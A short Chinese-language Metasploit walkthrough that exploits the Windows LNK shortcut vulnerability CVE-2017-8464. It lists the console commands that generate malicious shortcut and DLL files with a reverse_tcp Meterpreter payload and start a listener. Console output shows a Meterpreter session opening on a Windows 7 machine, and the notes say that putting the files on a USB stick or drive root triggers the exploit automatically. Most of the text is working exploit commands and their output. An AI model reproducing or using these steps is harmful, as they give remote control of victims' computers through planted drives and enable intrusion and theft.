MSF 简单使用

---

msf > use exploit/windows/smb/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/meterpreter/reverse_tcp ----------注意目标机器x64 或者x86
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.10 ----------设置回连IP
LHOST => 192.168.1.10
msf exploit(cve_2017_8464_lnk_rce) > run
执行完后会生成许多带盘符的快捷方式

---

msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > run
[] Started reverse TCP handler on 192.168.1.10:4444
[] Starting the payload handler...
运行后当把存放对应盘符的快捷方式和dll文件的U盘插上电脑时就会自动运行进行回连（木马放在根目录 可能需要手工点击快捷键）
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.5:50438) at 2017-08-14 14:57:25 +0800

meterpreter > sysinfo
Computer : HZJ-PC
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
每个link文件后的为对应盘符，将对应link文件和dll文件放入对应盘符下的根目录会自动触发漏洞，获取msf的session，不仅仅限制于U盘

---